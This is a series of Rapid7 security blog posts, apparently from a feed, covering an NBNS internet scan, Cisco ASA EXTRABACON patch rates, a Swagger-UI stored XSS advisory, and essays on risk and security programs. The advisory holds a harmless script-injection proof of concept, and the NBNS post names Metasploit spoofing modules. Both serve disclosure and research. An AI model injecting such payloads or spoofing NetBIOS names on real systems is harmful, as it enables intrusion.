For purposes of this document, we will be discussing NetBIOS over TCP/IP (NBT), documented in RFC 1001 and RFC 1002.

 

NBT is comprised of three services:

 

  • A name service for name resolution and registration (137/UDP and 137/TCP)
  • A datagram service for connectionless communication (138/UDP)
  • A session service for session-oriented communication (139/TCP)

 

The UDP variant of the NetBIOS over TCP/IP Name service on 137/UDP, NBNS, sometimes referred to as WINS (Windows Internet Name Service), is the focus of this study.  NBNS provides services related to NetBIOS names for NetBIOS-enabled nodes and applications.  The core functionality of NBNS includes name querying and registration capabilities and is similar in functionality and on-the-wire format to DNS but with several NetBIOS/NBNS specific details.

 

Although NetBIOS (and, in turn, NBNS) are predominantly spoken by Microsoft Windows systems, it is also very common to find this service active on OS X systems (netbiosd and/or Samba), Linux/UNIX systems (Samba) and all manner of printers, scanners, multi-function devices, storage devices, etc.  Fire up wireshark or tcpdump on nearly any network that contains or regularly services Windows systems and you will almost certainly see NBNS traffic everywhere:

 

Screen Shot 2016-09-01 at 12.16.27 PM.png

 

The history of security issues with NBNS reads much like that of DNS.  Unauthenticated and communicated over a connectionless medium, some attacks against NBNS include:

 

  • Information disclosure relating to generally internal/private names and addresses
  • Name spoofing, interception, and cache poisoning.

 

While not exhaustive, some notable security issues relating to NBNS include:

 

  • Abusing NBNS to attack the Web Proxy Auto-Discovery (WPAD) feature of Microsoft Windows to perform man-in-the-middle attacks, resulting in MS09-008/CVE-2009-0094.
  • Hot Potato, which leveraged WPAD abuse via NBNS in combination with other techniques to achieve privilege escalation on Windows 7 and above.
  • BadTunnel, which utilized NetBIOS/NBNS in new ways to perform man-in-the-middle attacks against target Windows systems, ultimately resulting in Microsoft issuing MS16-077.
  • Abusing NBNS to perform amplification attacks as seen during DDoS attacks as warned by US-CERT's TA14-017a.

 

 

Study Overview

Project Sonar's study of NBNS on 137/UDP has been running for a little over two years as of the publication of this document.  For the first year the study ran once per week, but shortly thereafter it was changed to run once per month along with the other UDP studies in an effort to reduce the signal to noise ratio.

 

The study uses a single, static, 50-byte NetBIOS "node status request" (NBSTAT) probe with a wildcard (*) scope that will return all configured names for the target NetBIOS-enabled node.  A name in this case is in reference to a particular capability a NetBIOS-enabled node has -- for example, this could (and often does) include the configured host name of the system, the workgroup/domain that it belongs to, and more.  In some cases, the presence of a particular type of name can be an indicator of the types of services a node provides.  For a more complete list of the types of names that can be seen in NBNS, see Microsoft's documentation on NetBIOS suffixes.

 

The probe used by Sonar is identical to the probe used by zmap and the probe used by Nmap.  A Wireshark-decoded sample of this probe can be seen below:

 

nbns_nbstat_request.png

 

This probe is sent to all public IPv4 addresses, excluding any networks that have requested removal from Sonar's studies, leaving ~3.6b possible target addresses for Sonar.  All responses, NBNS or otherwise, are saved.  Responses that appear to be legitimate NBNS responses are decoded for further analysis.

 

An example response from a Windows 2012 system:

 

nbns_nbstat_response.png

 

As a bonus for reconnaissance efforts, RFC 1002 also describes a field included at the end of the node status response that includes statistics about the NetBIOS service on the target node, and one field within here, the "Unit ID", frequently contains the ethernet or other MAC address.

 

NetBIOS, and in particular NBNS, falls into the same bucket that many other services fall into -- they have no sufficiently valid business reason for being exposed live on the public Internet.  Lacking authentication and riding on top of a connectionless protocol, NBNS has a history of vulnerabilities and effective attacks that can put systems and networks exposing/using this service at risk.  Depending on your level of paranoia, the information disclosed by a listening NBNS endpoint may also constitute a risk.

 

These reasons, combined with a simple, non-intrusive way of identifying NBNS endpoints on the public IPv4 Internet is why Rapid7's Project Sonar decided to undertake this study.

 

 

Data, Tools and Future Research

As part of Rapid7's Project Sonar, all data collected by this NBNS study is shared with the larger security community thanks to scans.io.  The past two years worth of the NBNS study's data can be found here with the -netbios-137.csv.gz  suffix.  The data is stored as GZIP-compressed CSV, each row of the CSV containing the metadata for the response elicited by the NBNS probe -- timestamp, source and destination IPv4 address, port, IP ID, TTL and, most importantly, the NBNS response (hex encoded).

 

There are numerous ways one could start analyzing this data, but internally we do much of our first-pass analysis using GNU parallel and Rapid7's dap.  Below is an example command you could run to start your own analysis of this data.  It utilizes dap to parse the CSV, decode the NBNS response and return the data in a more friendly JSON format:

 

pigz -dc ~/Downloads/20160801-netbios-137.csv.gz | parallel --gnu --pipe "dap csv + select 2 8 + rename 2=ip 8=data + transform data=hexdecode + decode_netbios_status_reply data + remove data + json"

 

As an example of some of the output you might get from this, anonymized for now:

 

{"ip":"192.168.0.1","data.netbios_names":"MYSTORAGE:00:U WORKGROUP:00:G MYSTORAGE:20:U WORKGROUP:1d:U ","data.netbios_mac":"e5:d8:00:21:10:20","data.netbios_hname":"MYSTORAGE","data.netbios_mac_company":"UNKNOWN","data.netbios_mac_company_name":"UNKNOWN"}
{"ip":"192.168.0.2","data.netbios_names":"OFFICE-PC:00:U OFFICE-PC:20:U WORKGROUP:00:G WORKGROUP:1e:G WORKGROUP:1d:U \u0001\u0002__MSBROWSE__\u0002:01:G ","data.netbios_mac":"00:1e:10:1f:8f:ab","data.netbios_hname":"OFFICE-PC","data.netbios_mac_company":"Shenzhen","data.netbios_mac_company_name":"ShenZhen Huawei Communication Technologies Co.,Ltd."}
{"ip":"192.168.0.3","data.netbios_names":"DSL_ROUTE:00:U DSL_ROUTE:03:U DSL_ROUTE:20:U \u0001\u0002__MSBROWSE__\u0002:01:G WORKGROUP:1d:U WORKGROUP:1e:G WORKGROUP:00:G ","data.netbios_mac":"00:00:00:00:00:00","data.netbios_hname":"DSL_ROUTE"}

 

There are also several Metasploit modules for exploring/exploiting NBNS in various ways:

 

  • auxiliary/scanner/netbios/nbname: performs the same initial probe as the Sonar study against one or more targets but uses the NetBIOS name of the target to perform a follow-up query that will disclose the IPv4 address(es) of the target.  Useful in situations where the target is behind NAT, multi-homed, etc., and this information can potentially be used in future attacks or reconaissance.
  • auxiliary/admin/netbios/netbios_spoof: attempts to spoof a given NetBIOS name (such as WPAD) targeted against specific system
  • auxiliary/spoof/nbns/nbns_response: similar to netbios_spoof but listens for all NBNS requests broadcast on the local network and will attempt to spoof all names (or just a subset by way of regular expressions)
  • auxiliary/server/netbios_spoof_nat: used to exploit BadTunnel

 

For a protocol that has been around for over 30 years and has had its fair share of research done against it, one might think that there is no more to be discovered, but the discovery of two high profile vulnerabilities in NBNS this year (HotPotato and BadTunnel) shows that there is absolutely more to be had.

 

If you are curious about NBNS and interested in exploring more, use the data, tools and knowledge provided above.  We'd love to hear your ideas or discoveries either here in the comments or by emailing research@rapid7.com.

 

Enjoy!

by Derek Abdine & Bob Rudis (photo CC-BY-SA Kalle Gustafsson)

 

Astute readers will no doubt remember the Shadow Brokers leak of the Equation Group exploit kits and hacking tools back in mid-August. More recently, security researchers at SilentSignal noted that it was possible to modify the EXTRABACON exploit from the initial dump to work on newer Cisco ASA (Adaptive Security Appliance) devices, meaning that virtually all ASA devices (8.x to 9.2(4)) are vulnerable and it may be interesting to dig into the vulnerability a bit more from a different perspective.

 

Now, "vulnerable" is an interesting word to use since:

 

  • the ASA device must have SNMP enabled and an attacker must have the ability to reach the device via UDP SNMP (yes, SNMP can run over TCP though it's rare to see it working that way) and know the SNMP community string
  • an attacker must also have telnet or SSH access to the devices

 

This generally makes the EXTRABACON attack something that would occur within an organization's network, specifically from a network segment that has SNMP and telnet/SSH access to a vulnerable device. So, the world is not ending, the internet is not broken and even if an attacker had the necessary access, they are just as likely to crash a Cisco ASA device as they are to gain command-line access to one by using the exploit. Even though there's a high probable loss magnitude1 from a successful exploit, the threat capability2 and threat event frequency3 for attacks would most likely be low in the vast majority of organizations that use these devices to secure their environments. Having said that, EXTRABACON is a pretty critical vulnerability in a core network security infrastructure device and Cisco patches are generally quick and safe to deploy, so it would be prudent for most organizations to deploy the patch as soon as they can obtain and test it.

 

Cisco did an admirable job responding to the exploit release and has a patch ready for organizations to deploy. We here at Rapid7 Labs wanted to see if it was possible to both identify externally facing Cisco ASA devices and see how many of those devices were still unpatched. Unfortunately, most firewalls aren't going to have their administrative interfaces hanging off the public internet nor are they likely to have telnet, SSH or SNMP enabled from the internet. So, we set our sights on using Project Sonar to identify ASA devices with SSL/IPsec VPN services enabled since:

 

  • users generally access corporate VPNs over the internet (so we will be able to see them)
  • many organizations deploy SSL VPNs these days versus or in addition to IPsec (or other) VPNs (and, we capture all SSL sites on the internet via Project Sonar)
  • these SSL VPN-enabled Cisco ASAs are easily identified

 

We found over 50,000 Cisco ASA SSL VPN devices in our most recent SSL scan. Keeping with the spirit of our recent National Exposure research, here's a breakdown of the top 20 countries:

 

Table 1: Device Counts by Country

Country

Device count

%

United States

25,644

   50.9%

Germany

3,115

   6.2%

United Kingdom

2,597

   5.2%

Canada

1,994

   4.0%

Japan

1,774

   3.5%

Netherlands

1,310

   2.6%

Sweden

1,095

   2.2%

Australia

1,083

   2.2%

Denmark

1,026

   2.0%

Italy

991

   2.0%

Russian Federation

834

   1.7%

France

777

   1.5%

Switzerland

603

   1.2%

China

535

   1.1%

Austria

497

   1.0%

Norway

448

   0.9%

Poland

410

   0.8%

Finland

404

   0.8%

Czech Republic

396

   0.8%

Spain

289

   0.6%

 

Because these are SSL VPN devices, we also have access to the certificates that organizations used to ensure confidentiality and integrity of the communications. Most organizations have one or two (higher availability) VPN devices deployed, but many must deploy significantly more devices for geographic coverage or capacity needs:

 

figure_01-1.png

 

Table 2: List of organizations with ten or more VPN ASA devices

Organization

Count

Large Japanese telecom provider

55

Large U.S. multinational technology company

23

Large U.S. health care provider

20

Large Vietnamese financial services company

18

Large Global utilities service provider

18

Large U.K. financial services company

16

Large Canadian university

16

Large Global talent management service provider

15

Large Global consulting company

14

Large French multinational manufacturer

13

Large Brazilian telecom provider

12

Large Swedish technology services company

12

Large U.S. database systems provider

11

Large U.S. health insurance provider

11

Large U.K. government agency

10

 

So What?

 

The above data is somewhat interesting on its own, but what we really wanted to know is how many of these devices had not been patched yet (meaning that they are technically vulnerable if an attacker is in the right network position). Remember, it's unlikely these organizations have telnet, SSH and SNMP enabled to the internet and researchers in most countries, including those of us here in the United States, are not legally allowed to make credentialed scan attempts on these services without permission. Actually testing for SNMP and telnet/SSH access would have let us identify truly vulnerable systems. After some bantering with the extended team (Brent Cook, Tom Sellers & jhart) and testing against a few known devices, we decided to use hping to determine device uptime from timestamps and see how many devices had been rebooted since release of the original exploits on (roughly) August 15, 2016. We modified our Sonar environment to enable hping studies and then ran the uptime scan across the target device IP list on August 26, 2016, so any system with an uptime > 12 days that has not been rebooted (or is employing some serious timestamp masking techniques) is technically vulnerable. Also remember that organizations who thought their shiny new ASA devices weren't vulnerable also became vulnerable after the August 25, 2016 SilentSignal blog post (meaning that if they thought it was reasonable not to patch and reboot it became unreasonable to think that way on August 25).

 

So, how many of these organizations patched & rebooted? Well, nearly 12,000 (~24%) of them prevented us from capturing the timestamps. Of the remaining ones, here's how their patch status looks:

 

figure_02-1.png

We can look at the distribution of uptime in a different way with a histogram, making 6-day buckets (so we can more easily see "Day 12"):

 

figure_03-1.png

 

This also shows the weekly patch/reboot cadence that many organizations employ.

 

Let's go back to our organization list and see what the mean last-reboot time is for them:

 

Table 3: hping Scan results (2016-08-26)

Organization

Count

Mean uptime (days)

Large Japanese telecom provider

55

33

Large U.S. multinational technology company

23

27

Large U.S. health care provider

20

47

Large Vietnamese financial services company

18

5

Large Global utilities service provider

18

40

Large U.K. financial services company

16

14

Large Canadian university

16

21

Large Global talent management service provider

15

Unavailable

Large Global consulting company

14

21

Large French multinational manufacturer

13

34

Large Brazilian telecom provider

12

23

Large Swedish technology services company

12

4

Large U.S. database systems provider

11

25

Large U.S. health insurance provider

11

Unavailable

Large U.K. government agency

10

40

 

Two had no uptime data available and two had rebooted/likely patched since the original exploit release.

Fin

 

We ran the uptime scan after the close of the weekend (organizations may have waited until the weekend to patch/reboot after the latest exploit news) and here's how our list looked:

 

Table 4: hping Scan Results (2016-08-29)

Organization

Count

Mean uptime (days)

Large Japanese telecom provider

55

38

Large U.S. multinational technology company

23

31

Large U.S. health care provider

20

2

Large Vietnamese financial services company

18

9

Large Global utilities service provider

18

44

Large U.K. financial services company

16

18

Large Canadian university

16

26

Large Global talent management service provider

15

Unavailable

Large Global consulting company

14

25

Large French multinational manufacturer

13

38

Large Brazilian telecom provider

12

28

Large Swedish technology services company

12

8

Large U.S. database systems provider

11

26

Large U.S. health insurance provider

11

Unavailable

Large U.K. government agency

10

39

 

Only one additional organization (highlighted) from our "top" list rebooted (likely patched) since the previous scan, but an additional 4,667 devices from the full data set were rebooted (likely patched).

 

This bird's eye view of how organizations have reacted to the initial and updated EXTRABACON exploit releases shows that some appear to have assessed the issue as serious enough to react quickly while others have moved a bit more cautiously. It’s important to stress, once again, that attackers need to have far more than external SSL access to exploit these systems. However, also note that the vulnerability is very real and impacts a wide array of Cisco devices beyond these SSL VPNs. So, while you may have assessed this as a low risk, it should not be forgotten and you may want to ensure you have the most up-to-date inventory of what Cisco ASA devices you are using, where they are located and the security configurations on the network segments with access to them.

 

We just looked for a small, externally visible fraction of these devices and found that only 38% of them have likely been patched. We're eager to hear how organizations assessed this vulnerability disclosure in order to make the update/no update decision. So, if you're brave, drop a note in the comments or feel free to send a note to research@rapid7.com (all replies to that e-mail will be kept confidential).

 


1,2,3 Open FAIR Risk Taxonomy [PDF]

Parameters within a Swagger document are insecurely loaded into a browser based documentation. Persistent XSS occurs when this documentation is then hosted together on a public site. This issue was resolved in Swagger-UI 2.2.1.

Summary

One of the components used to build the interactive documentation portion of the swagger ecosystem is the Swagger-UI. This interface generates dynamic documentation based on a referenced Swagger document that can interact with the referenced API.  If the swagger document itself contains XSS payloads, the swagger-ui component can be tricked into injecting unescaped content into the DOM.

Product Description

From the README at https://github.com/swagger-api/swagger-ui

"Swagger UI is part of the Swagger project. The Swagger project allows you to produce, visualize and consume your own RESTful services. No proxy or 3rd party services required. Do it your own way.

Swagger UI is a dependency-free collection of HTML, Javascript, and CSS assets that dynamically generate beautiful documentation and sandbox from a Swagger-compliant API. Because Swagger UI has no dependencies, you can host it in any server environment, or on your local machine."

The swagger UI will parse a chosen swagger file, and generate dynamic colorful documentation that enables users to interact with a RESTful API.

Credit

Scott Lee Davis, scott_davis@rapid7.com, Application Security Researcher, Rapid7

Exploitation

 

If a swagger file contained in the definitions section, a default value with an XSS payload can be loaded unescaped into the DOM.

 

 

Definitions
  Type: string
  Description: prints xss
  Default: <script>console.log(‘000000000000000000dad0000000000000000000’);</script>



Mitigations

Sanitation of HTML content should be done by an engine built for the job.  The swagger-ui team chose to solve this issue with the npm module santize-html.

Disclosure Timeline

This vulnerability advisory was prepared in accordance with Rapid7's disclosure policy.

  • Thu, Jun 09, 2016: Discovery by Scott Lee Davis of Rapid7, Inc.
  • Fri, Jun 17, 2016: Attempted to contact the vendor
  • Mon, Jul 11, 2016: Disclosed details to the vendor at security@swagger.io
  • Wed, Jul 27, 2016: Disclosed details to CERT as VR-316
  • Tue, Aug 09, 2016: CVE-2016-5682 assigned by CERT
  • Tue, Aug 23, 2016: Fixed in Swagger-UI 2.2.1
  • Fri, Sep 02, 2016: Public disclosure

This is a guest post from our frequent contributor Kevin Beaver. You can read all of his previous guest posts here.

 

When it comes to being successful in security, you must master the ability to “sell” what you’re doing. You must sell new security initiatives to executive management. You must sell security policies and controls to users. You even have to sell your customers and business partners on what you’re doing to minimize information risks. This selling is made up of various components including credibility and self-confidence, direct involvement with the business, and demonstrating the ongoing value of what you’re doing.

 

There’s one aspect of selling, however, that’s often unknown or forgotten in the interest of expediency – checking boxes and getting things done yesterday – all bad ways to go about doing things in security. The missing link is patience, or the lack thereof. Sales expert Jeffrey Gitomer said that people don’t like to be sold but they love to buy. In other words, they don’t want things forced on them, but instead, they want to be in control of the decision-making process. When an idea becomes familiar – in a casual manner – it becomes better understood. It’s most certainly less threatening. People will only buy into your ideas when they’re convinced that you’re on their side. There's a little trick you can use when you present new ideas in the process of selling security to others: do it casually for future consideration.

 

Psychologists say that people need about 72 hours to absorb new ideas. So, regardless of the subject matter or how urgent you think your issue is, an idea that you present casually and indifferently will be considered more and accepted better over the long-term. It seems like a no-brainer but this is something that’s rarely put into practice. When it comes to security, everything is urgent: assessments and audits, technical controls, training programs and even policy-related issues. There’s always a fire to put out.

 

Your job as the person in charge of security is to start thinking about how you can slowly get the right people on board with what you’re trying to accomplish. Start today sharing your thoughts, ideas, and goals with management. Talk to your users about what you’re doing to not only improve security but also make their jobs easier. Plant the seeds. Let things simmer. Whatever you do, don’t force security on others. Think long-term. U.S. Navy admiral Hyman Rickover once said “Good ideas are not adopted automatically. They must be driven into practice with courageous patience." Let this approach help drive your security program. You’ll not only build better relationships but you’ll have a much better chance of getting things done. That’s the sign of a true information security leader.

In case you haven't yet met someone from Rapid7, you should know that we care about improving security at all companies. We have no interest in selling you products that are going to sit on your shelf, so I recently wore makeup for the first time and sat down for a live videocast with Sara Peters from Dark Reading and John Pironti from IP Architects to talk through how organizations can get their people, process, and technology working together to prioritize and respond to security threats in real time.thats-how-you-debate.jpg

 

So what did we discuss? Somehow, I didn't black out like Frank the Tank in the all-important debate to save the frat, so I remember three major themes we hadn't really planned prior to the cameras starting to roll: preparation, being realistic, and data vs. intelligence.

 

What do I mean by this? Well, I hate watching myself on video, so I'll paraphrase from memory:

 

Preparation

No security team, no matter the skill level, can be dropped into a new organization and start responding to threats in real time. There needs to be a great deal of attention to the basics of security hygiene, getting buy-in from leadership on the approach, and operating according to plan. No technology is going to solve this for us; the team of IT, InfoSec, and Risk stakeholders need to develop playbooks as a group, test themselves as a group, and develop the level of trust in each other necessary to take action right as problems arise. The "test themselves as a group" part is rarely done, but might be the most valuable piece for improving overall effectiveness.

 

Being realistic

Dont-Worry-About-The-Wrong-Things.jpgMultiple times in our discussion, we brought up the unrealistic scenarios for most businesses. Should you be worried about nation state attacks? Do you need to protect against Stuxnet? Do you need to rush to protect yourself against the latest zero-day with a logo and catchy name? The answer to all three of these questions is: most likely not. Your focus should first be on defending the assets at the core of your business against the opportunistic attacks that use well-known exploits. Additionally, if you aren't involved in helping the organization adopt the latest technology that makes it productive, they are going to be used anyway - just not in a secure fashion.

 

Data vs. intelligence

This topic of data needing context to become information and needing to be relevant to you to actually constitute intelligence has been a common discussion topic at Rapid7 lately. We all agreed that threat intelligence is not just a list of IP addresses from an unknown source, but an organization's log and other machine data are no different. Your goal should be to get the right information for you team, not simply accessing all of the data.

 

To watch the full video on-demand, even if only to get black mail screen grabs of me in makeup, check it out here:

Prioritizing And Responding To Security Threats In Real Time - Webcast - 2016-08-16 13:00:00 EDT

 

If you want to learn more about the various ways Rapid7 can help your business, our Advisory Services are often a good place to start.

...and then it might be too late.

 

 

Recently, Delta Airlines suffered a weeklong outage that, if you take it on it's face, ticks just about every box on a security person's disaster recovery planning scenario.

 

Delta has given multiple interviews on what happened. Although details are still being pieced together, essentially the company had a power issue, and when it tried to go to backup systems, they had failures. I managed a data center for several years, and this what keeps data center mangers up at night: the what-if-it-doesn't-come-back-up scenario.

 

The outage cost Delta millions of dollars in recovery effort, including vouchers that were given to customers who were inconvenienced. They severely impacted travelers by cancelling hundreds of flights, and likely suffered some reputational damage.

 

Hindsight being 20/20, this scenario - with good risk management - can be avoided, or at the very least can be reduced, but it takes awareness, resources and buy in from top management. Ed Bastian, the CEO of Delta, has taken personal responsibility for the failure. We can expect significant internal review of the disaster preparedness scenarios their IT teams are involved in.

 

Business continuity and disaster recovery is also a security professional's concern, impacting the CIA triad's most demanding principle, Availability. Availability means that information is available to users when they need it. Availability can take many different forms, depending on the business context. Delta, as a company which operates 24x7x365, relies on availability and any impact to that also impacts the timing of fleet operations. Even minor disruptions cause cascades which severely and adversely affect the business. Sensitivity to availability is one reason it took so long for Delta to fully recover; the longer they stayed down the worse the problem got amplified.

 

"The system moved to backup power but not all the servers were connected to it," Bastian told the WSJ.

 

Documentation is a key to all disaster planning. You have to understand in your disaster recovery (DR) plan what will and will not be part of your backup system. It is very expensive to maintain a full replica of your systems, so your DR plan might account for only a partial recovery. The business risk of a partial recovery must be documented and communicated so everyone understands what will happen in a disaster scenario. Bastian commented "We did not believe, by any means, that we had this kind of vulnerability."

 

Use this issue, and that of a few weeks earlier of Southwest Airlines that lasted four days, to review your business continuity/disaster recovery plans, and especially create them if you don't have any in place. Test your recovery plans at regular intervals, using tabletop walkthroughs and actual recovery techniques, and make upper management aware of the outcomes. Use these results to drive improvements in planning for availability, and you can avoid or reduce the impact of a disaster scenario. And always remember to revisit and update your plan at regular intervals, especially at the conclusion of a test, to ensure you have up to date and relevant information.

 

At a minimum, your disaster plan should include:

 

  • Paper copies of everything relevant to the disaster plan; online resources will likely be disrupted, even if you have highly available systems or cloud-based ones
  • Contact information of all relevant stakeholders in a disaster; C-levels, technicians, business people, customers; anyone who would need to be part of the recovery scenarios; include physical addresses of sites and phone numbers of required resources
  • A list of required vendors your organization needs to operate in the event of a disaster scenario; include contact information for those vendors
  • A map of all systems which would function on backup power; include all the networking devices between the systems (switches, routers, storage); map the systems to business functions so you can see visually which functions would be disrupted and which would be operational
  • Maps of physical locations that are relevant to disaster recovery
  • Forms which are critical to business operations such as supply order forms, injury reports, expense tracking, etc
  • Disaster declaration procedures, and communication procedures (who to contact when, who is in charge of media relations, etc)
  • Checklists and runbooks on operations processes - specifically this is required so the distractions of a disaster do not impact running operations, and don't require memory or specific skill to accomplish

 

This is just a short list, and does not go into the specifics of disaster planning, but it's a good start and validation point. Once you have checked off this list, start to look at recovery time objectives (RTO), recovery point objectives (RPO), and true business continuity process (processes which allow business to continue uninterrupted, even during an outage). There's a host of resources online and third party providers which are available to help.

 

According to the WSJ article, “It’s not clear the priorities in our investment have been in the right place,” Mr. Bastian said. “It has caused us to ask a lot of questions which candidly we don’t have a lot of answers for.” Upper management can be reluctant to put money into disaster recovery, seeing it more as an insurance policy, which it partially is. Testing isn't just to vet your plans, it's also to ensure that priorities get positioned correctly. If testing shows that not all systems would be recoverable, then investment can justified.

 

Disaster planning requires time and some resources to accomplish. This is an investment in the future, and any time invested now will be offset by the reduction in recovery time later, and hopefully, the lessened impact on your business operations.

Read most security vendors’ websites (yes, we know what we are) and you’ll generally find something about the terrifying “Risk of Insider Threats.” Rogue employees are lurking around every corner. You try to hire good honest people, brimming with integrity, but still these evildoers slip through the net and before you know it they are trying to take

you down. They don’t care that you have a family to feed, that you put your life and soul into creating a flourishing cave.jpgbusiness. Maybe you should just go self-employed. Switch off the internet and go back to pen and paper. Reduce the risk completely and become a cave-dwelling hermit. Actually, can you come back out of the cave and turn the internet back on for a moment please? Thanks.

 

I hope the mild exaggeration in the above paragraph was apparent. And if that’s the reality in your business perhaps it’s time to rethink your hiring strategy (and maybe go back to the cave after all, it was nice in there right?). Most of your employees really like you having a business, they don’t want to ruin it, and they aren’t going to do something purposely malicious. There is a BUT coming, though. Actually, there are two, because reality is a harsh mistress.

BUT #1... Insider threats are real.

I’m sorry, I’m being That Vendor. We haven’t invented this as an industry, I promise. It does only take one person to cause a lot of potential damage – take the recent Sage data breach as an example. Hundreds of detailed financial customer records accessed by an unauthorised* employee. A the time of writing this, the Sage investigation is ongoing - an arrest has been made, and a lot of Sage's customers have received a notification that their details may have been on the list. Like I said, it just takes one.

 

*that isn't a typo btw, I’m from that tiny island over the pond, we just don't do zeds with the same level of enthusiasm that Americans do #sorrynotsorry

 

BUT #2... Unwitting insider threats are a much greater concern.

This isn’t a disgruntled employee, it’s someone who can easily open up your business to the evils of the outside world. They clicked on a dodgy Facebook link from a friend, they opened up an "invoice" which turned out to be hiding malicious code, they chomped down on the hook of a phishing email and before you can say Wicked Tuna, there’s a keylogger or tuna.jpgworse sitting on their PC. Their user credentials get captured and delivered off to someone truly malicious outside of your organisation. Your employee didn’t mean to cause a problem, they just didn’t know any better.  And they’d possibly do the same thing all over again tomorrow.

 

Understanding the risk posed by your employees, the users of your systems, the people who access critical data that’s key to your business is so much bigger than worrying about the occasional rogue employee.

 

Bonus BUT (because marketing)... Compromised user credentials behave just like insider threats

Protecting assets is an important part of any security program, no doubt about it, but a huge number of data breaches are caused by compromised user credentials (the Verizon Data Breach Investigations Report has this as the top method of attackers breaching a network every year from 2013). These are user accounts that look, feel and smell like the real deal because That’s Exactly What They Are. They just got into the wrong hands. And if you fall into the 60% of organisations who have no way to detect compromised credentials, you won’t be able to tell the difference between a bona fide user and an attacker using a compromised account. On the plus side, they won't be hogging the drinks table at your summer party, but that's really the smallest of wins.

 

Call to action: Don’t be a hermit!

If you’re thinking seriously about that cave option again, it’s OK, you don’t need to (unless cave dwelling is actually your thing, but let’s assume otherwise because it’s a little niche). Take stock, think about where your weak spots are. Would your employees benefit from some up-to-date security awareness training? How robust are those incident response processes?  When did you last health-check your overall security program? Do you have the capabilities to quickly spot an attacker who’s got their grubby mitts on the keys to your metaphorical castle (or cave, obvs)?

 

If the answers to those questions aren’t clear, we can help you get a plan together. You can gain the insight you need to be able to protect your business. Visit our web page on compromised credentials and learn more about how we can help you achieve this.

 

Samantha Humphries

The SANS State of Cyber Threat Intelligence Survey has been released and highlights some important issues with cyber threat intelligence:

 

Usability is still an issue - Almost everyone is using some sort of cyber threat intelligence. Hooray! The downside – there is still confusion as to the best ways to implement and utilize threat intelligence, and the market is not making it any easier. We believe that the confusion is related to the initial push by threat intelligence vendors to sell list-based threat intelligence – lists of IPs, lists of domains, etc – with little, or even worse, no context. This type of threat feed is data, not intelligence, but it is easy to put together and it isn’t too difficult to integrate with security tools that are used to receiving blacklists or signature based threat data. That…well…to put it nicely, doesn’t exactly work. The survey shows that over 60% of respondents are using threat intelligence to block malicious domains or IP addresses, which contributes to high false positives and a nebulous idea of what threat intelligence is actually supposed to be doing. However, nearly half use threat intelligence to add context to investigations and assessments, which is a much better application of threat intelligence and even though it uses some of the same data sources, it requires the additional analysis that actually turns it into intelligence. A smaller number of respondents reported that they use threat intelligence for hunting or to provide information to management (28 and 27 percent, respectively), but it appears that these areas are growing as organizations identify the value they provide.

 

Threat Intelligence helps to make decisions - 73% of respondents said that they felt they could make better and more informed decisions by using threat intelligence. 71% said that they had improved visibility into threats by using threat intelligence. These are both key aspects of threat intelligence and indicate that more organizations are using threat intelligence to assist with decision making rather than only focusing on the technical, machine to machine aspect of threat intel.  One of the overarching goals in intelligence work in general is to provide information to decision makers about the threats facing them, and it is great to see that this application of CTI is growing. CTI can be used to support every aspect of a security program, from determining general security posture and acceptable level of risk to prioritizing patching and alerting, and threat intelligence can provide insight to support all of these critical decisions.

 

More isn’t necessarily better – the majority of respondents who engage in incident response or hunting activities indicated that they could consume only 11-100 indicators of compromise on a weekly basis, and can only conduct in-depth research and analysis on 1-10 indicators per week. Since there are approximately eleventy-billion indicators of compromise being generated and exchanged every week that puts a lot of pressure not only on analysts, but on the tools we use to automate the collection and processing of data. Related – two of the biggest pain points respondents had with implementing cyber threat intelligence are the lack of technical capabilities to integrate CTI tools into environments, and the difficulty of implementing new security systems and tools. In order to automate the handling of large amounts of indicators in a way that allows analysts to zero in on the most important and relevant ones, we need to have confidence in our collection sources, confidence in our tools, and confidence in our processes. More of the wrong type of data isn’t better, it distracts from the data that is relevant and makes it nearly impossible for a threat intelligence analyst to actually conduct the analysis needed to extract value.

 

Download the SANS State of Cyber Threat Intelligence Survey here.

 

To learn more about our approach to integrating threat intelligence into incident detection and response processes, come join us for an IDR intensive session at our annual conference, UNITED Summit.

This is a guest post from our frequent contributor Kevin Beaver. You can read all of his previous guest posts here.

 

Small and medium-sized businesses (SMBs) have it made in terms of security. No, I’m not referring to the threats, vulnerabilities, and business risks. Those are the same regardless of the size of the organization. Instead, I’m talking about how relatively easy it is to establish and build out core information security functions and operations when the business is small. Doing this in an organization with a handful of employees – maybe a dozen or two – that has a simple network and application environment (in-house and in the cloud) is unbelievably simple compared to doing it in larger organizations.

 

I’ve helped several small businesses build out their policies, security testing/assessment processes, and technologies over the years and it’s so neat to see how they’ve been able to progress from essentially firewalls and anti-virus to a full-blown IT/security governance program that rivals that of any large enterprise – all with minimal effort over time, relatively speaking. It’s the equivalent of parents establishing good habits around eating and exercising in young children that they learn from and build upon for the rest of their lives instead of doctors and dieticians having to convince a 45-year old type 2 diabetic that he has to change his entire lifestyle if he’s going to fix his heart problems and live past 50. The former is much easier (and less costly) than the latter.

 

One of the biggest challenges with SMBs is that they may not think they’re a target, that they don’t have to comply with the various security and privacy regulations, or that they even know about information security practices at all. The former two resolve themselves pretty quickly through breaches and pressures from business partners and customers who are often large businesses that have stringent security requirements. The latter is the biggest concern in large part due to these business’s third-party IT consultants/service providers not fully understanding security. Many, perhaps most, small businesses start out using an outside IT services provider and I’ve witnessed a fox guarding the henhouse situation numerous times over the years whereby these outside providers implement firewalls, anti-virus software, and data backup solutions and that’s where security begins and, unfortunately, ends.

 

Another situation that builds on this is something I see with many smaller businesses: technologies and policies are put in place but a security assessment is never performed to determine where things truly stand. It's the cart before the horse. The builder remediation before the home inspection. The chemotherapy before the CT scan. You can’t force people to look past their false sense of security but it sure is a big oversight in the SMB space that needs some quick attention.

 

So, SMB security is simple but it can be kind of complicated if it’s made out to be. The choice is yours – focus on security now while you’re young and reap the rewards of simplicity or put it off so it’s more expensive and exponentially more complicated when you’re forced to address it down the road. If you own, work for, or serve as a consultant to a small or medium-sized business, make the decision to start and build out a basic information security program. Don’t wait, get started on it now and grow into it over time. It’ll look after itself as complexity grows with the business and will be so much easier to tweak that having to start from scratch. Something that I can say with conviction because I’ve been a part of it: you will not regret it.

First off: Hi! I’m the new community manager here at Rapid7. And like many in the security community, I’ll be heading to Vegas for Black Hat, BSidesLV and DEF CON in a little more than a week. I’m looking forward to diving right in to meeting the community and learning from some of the smartest professionals in the industry. I’ve prepped by reading last year’s Black Hat Attendee Guide and if you’re heading to Vegas, I recommend you take a look, too.

 

I’d also like to introduce you to someone else. The Rapid7 Moose.

 

